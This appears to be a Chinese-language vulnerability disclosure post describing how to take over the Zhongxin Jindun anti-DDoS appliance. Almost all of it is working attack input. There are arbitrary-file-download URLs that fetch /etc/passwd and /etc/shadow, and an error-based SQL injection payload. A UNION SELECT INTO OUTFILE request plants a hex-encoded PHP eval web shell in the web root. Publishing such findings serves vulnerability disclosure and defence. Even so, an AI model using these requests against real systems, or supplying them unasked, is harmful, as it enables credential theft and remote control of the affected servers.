中新金盾抗拒绝服务系统GetShell漏洞

文章目录

漏洞作者: Tea

任意文件下载漏洞:

https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwd

https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/shadow

122316232ce787f8e719e52a2c9e8a2d0749fc1f

SQL注入漏洞(数量不少,其他文件用的addslashes()呢?咋不用了。):

攻击分析菜单里面的列表–>

查询主机,都存在注入,这里只列一个。

POC:

‘and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

1223165038f3b824cdf5bf131d7bcd8c00129c6a

122316591bc24a89760b3809215f5d8855f10e26

GetWebshell:

首先通过下载任意文件漏洞下载源码文件,获得Web路径:

/xxx/usx/XXXx/

再通过SQL注入导出文件到WEB目录:

https://1.1.1.1:28XX3/cgi-bin/index.php?t=analysis_attack&c=getAttDetailById&_=1119844506390&o=json&id=-54′ Union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e,2,3,4 from mysql.user into outfile ‘/xxx/usx/XXXx/z.php’%23

1223265177afdff4771e9fc9c42f073b66641021

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录